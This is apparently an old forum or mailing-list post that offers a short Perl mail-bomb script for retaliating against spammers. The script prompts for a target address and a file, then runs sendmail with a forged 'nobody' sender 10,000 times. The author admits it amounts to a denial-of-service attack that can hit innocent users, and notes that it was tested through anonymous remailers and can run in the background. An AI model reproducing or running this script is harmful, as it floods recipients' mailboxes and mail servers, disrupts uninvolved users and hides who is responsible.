OK...I know this borders on a "denial of service" attack since it may effect innocent users. How would you like to be the one to explain to your System Administrator that the Megabytes of returned Spam on the disk are yours? I realize that some peoples implementations of Sendmail will tell who your are regardless, so you might have to modify the "system" line for your own tastes. Also you might *not* want to be anon. Please feel free to modify to your own tastes. The delay loop is to space out the load. I also tried it with premail instead of Sendmail and it went thru the remailers just fine. It should be capable of running in the background. Only took 5 minutes to write and a couple of remailers to test. ============================================================ #!/usr/bin/perl print "Who does this go to?: "; chop($name = <STDIN>); print "What is the filename to send?: "; chop($filename = <STDIN>); for ($a=0;$a<100;$a++) { for ($b=0;$b<100;$b++) { system ("/usr/lib/sendmail -f nobody $name < $filename"); for ($x=0;$x<600000;$x++){}; } } ============================================================